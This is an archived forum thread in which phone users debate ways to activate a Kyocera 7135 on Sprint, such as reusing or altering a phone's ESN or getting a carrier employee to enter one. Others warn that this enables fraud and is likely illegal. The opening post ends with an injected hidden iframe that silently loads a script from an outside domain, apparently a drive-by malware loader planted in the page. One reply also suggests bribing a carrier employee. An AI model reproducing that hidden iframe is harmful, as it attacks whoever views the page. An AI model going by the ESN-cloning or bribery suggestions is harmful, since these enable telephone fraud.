+ Reply to Thread

Thread: Sprint ideas

Sprint ideas

Yesterday Marc suggested giving Sprint the serial number (ESN) of a 6035 and following activation on a 7135. I got to thinking that it may be different than the 7135, as the older phone is not 1xRTT capable.

However Marc's idea may work, or maybe the ESN from a Treo? Does anyone who has hacked a 7135 know how to get to the ESN in the phone's memory? If you could hack that and change it to a Sprint ESN, then I would think the idea may work.

C'mon Sprint users, I have to think that we may be on to something. It's a little frustrating to have Kyocera dangling the phone on the website with no way to use it!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Sprint ideas

Originally posted by WhoDat
    Yesterday Marc suggested giving Sprint the serial number (ESN) of a 6035 and following activation on a 7135. I got to thinking that it may be different than the 7135, as the older phone is not 1xRTT capable.

However Marc's idea may work, or maybe the ESN from a Treo? Does anyone who has hacked a 7135 know how to get to the ESN in the phone's memory? If you could hack that and change it to a Sprint ESN, then I would think the idea may work.

C'mon Sprint users, I have to think that we may be on to something. It's a little frustrating to have Kyocera dangling the phone on the website with no way to use it!
    The phone vendors make it VERY hard to hack ESN's. ESN's are what keep you safe from telephone fraud. If you could hack the ESN, anybody and their brother could put your ESN in their phone and place calls on your account....

Alan

Someone has to know how to do this on the 7135, or atleast it can be figured out. Please keep this thread going, if this works, im ordering my 7135 soon!!

Someone also mentioned that hackingchanging the ESN could be illegal.

Well then, it ought to be illegal to promise a release date (with implication that it Sprint is included) before the holidays!

Actually, the ESN hacking does sound as though it should be illegal, and probably for good reasons.

The better hope is that someone at Sprint would enter a custom ESN for a user.

Has anyone tried to activate a 7135 on Sprint using the Alltel ESN? What if someone bought a 7135 on eBay and only knew that it was a CDMA phone? There is probably no one on these boards that could claim such ignorance, but what if...?

Originally posted by WhoDat
    Well then, it ought to be illegal to promise a release date (with implication that it Sprint is included) before the holidays!

Actually, the ESN hacking does sound as though it should be illegal, and probably for good reasons.

The better hope is that someone at Sprint would enter a custom ESN for a user.

Has anyone tried to activate a 7135 on Sprint using the Alltel ESN? What if someone bought a 7135 on eBay and only knew that it was a CDMA phone? There is probably no one on these boards that could claim such ignorance, but what if...?
    This is the last time I am going to say this... IF anyone has managed to get a non-sprint ESN added to the Sprint database, they are not going to publicly admit it as long as the employee who did this favor for them is still employed with Sprint. Adding a non-sprint ESN is a violation of corporate policy and grounds for dismissal. If you know someone at Sprint, you could try sweet talking or bribing them, but asking on a public bulletin board is going to get you nowhere...

They'll either release the phone when they are ready, or they will decide not to. At least with Sprint you have two vision capable smartphones to hold you over.....

Alan
    Alan

Somebody haul this poor horse away. It couldn't be beaten any more than it has already.
    ~'kito
    pdaPhoneHome Moderator

Originally posted by Markito
    Somebody haul this poor horse away. It couldn't be beaten any more than it has already.
    I smell glue.

Shwemp

Yeah, really.... if anyone would try to get this done, it would be me..... but I've rarely heard of it ever happening... and I don't know any Sprint people who would do this. But maybe I should try to meet some
    Please visit my picture site: Robert-O-Rama :)

Administrator
    dont try to hack the esn... just use the esn of a 6035. they are both the same kindsa phone but one just has vision. just giving them the esn and always keeping the old 6035 off may work... or not.. maybve the esn is not sent with each call you make.. who knows... just a thuoght... but i like this so lets keep it up...

Originally posted by marctronixx
    dont try to hack the esn... just use the esn of a 6035. they are both the same kindsa phone but one just has vision. just giving them the esn and always keeping the old 6035 off may work... or not.. maybve the esn is not sent with each call you make.. who knows... just a thuoght... but i like this so lets keep it up...
    um.. no. The ESN is transmitted to the network when you power the phone on, with every "keep-alive" message to the network, and with every call. All that will happen when you use the ESN of a 6035 is that the 6035 will be activated on teh network. The 7135 will still be an interesting looking PALM....

This is a non-starter. There are only two ways we will see 7135's on Sprint. 1) They decide to carry it. 2) They change their policy regarding activating 3rd party phones.

Best solution to either of those is to call, write, and complain to everyone at Sprint, form the CS agent who answers your call to the CEO. (or just be patient, becuase they are almost sure to carry it....)

Alan

Originally posted by alanb
    or just be patient, because they are almost sure to carry it....
    That's not what I've been reading lately on other websites.
    ~'kito
    pdaPhoneHome Moderator

That's not what I've been reading lately on other websites.
    They probably read here about my diabolical plot to tie up Vision 24/7 and take over the world from my 7135
    Please visit my picture site: Robert-O-Rama :)

I have yet to see anything more reliable than the "7135 will be out before xmas" rumors stating that Sprint wont be carrying it.
    I haven't seen anything at all that supposedly even came from Sprint.
    Where are you all seeing this at?

amen - kito - there is more horse's blood here than was spilt defending the keep :o

amen - kito - there is more horse's blood here than was spilt defending the keep (if this reference is confusing to you - go see lotrtt :o

So is there still no way to get this phone activated on sprint ?

DLD

Administrator
    unless you know someone who can slip in the ESN into their database, the answer is still no...

lets hope sprint will carry it...